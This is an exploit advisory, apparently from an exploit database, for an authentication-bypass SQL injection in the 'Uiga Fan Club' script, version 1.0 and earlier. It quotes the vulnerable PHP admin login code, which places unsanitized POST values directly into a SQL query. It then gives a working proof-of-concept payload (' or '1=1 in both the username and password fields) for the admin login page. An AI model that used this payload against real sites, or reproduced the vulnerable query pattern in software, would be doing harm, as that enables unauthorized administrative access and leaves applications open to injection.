35 lines
No EOL
1,016 B
Text
35 lines
No EOL
1,016 B
Text
# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
|
||
###########################################################################
|
||
# Author: cr4wl3r
|
||
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
|
||
###########################################################################
|
||
#if (isset($_POST['admin_name']))
|
||
# {
|
||
# $admin_name=$_POST['admin_name'];
|
||
# $admin_password=$_POST['admin_password'];
|
||
#
|
||
#
|
||
# if(empty($admin_name))
|
||
# {
|
||
# $errorMessage=warning." Username is empty!";
|
||
# }
|
||
# elseif(empty($admin_password))
|
||
# {
|
||
# $errorMessage=warning." Password is empty!";
|
||
# }
|
||
#
|
||
#
|
||
# else
|
||
# {
|
||
# $sql="SELECT *
|
||
# FROM admin
|
||
# WHERE admin_name='$admin_name' and admin_password='$admin_password'";
|
||
#
|
||
###########################################################################
|
||
|
||
###############################################
|
||
PoC: [path]/admin/admin_login.php
|
||
|
||
Username: ' or '1=1
|
||
password: ' or '1=1
|
||
############################################### |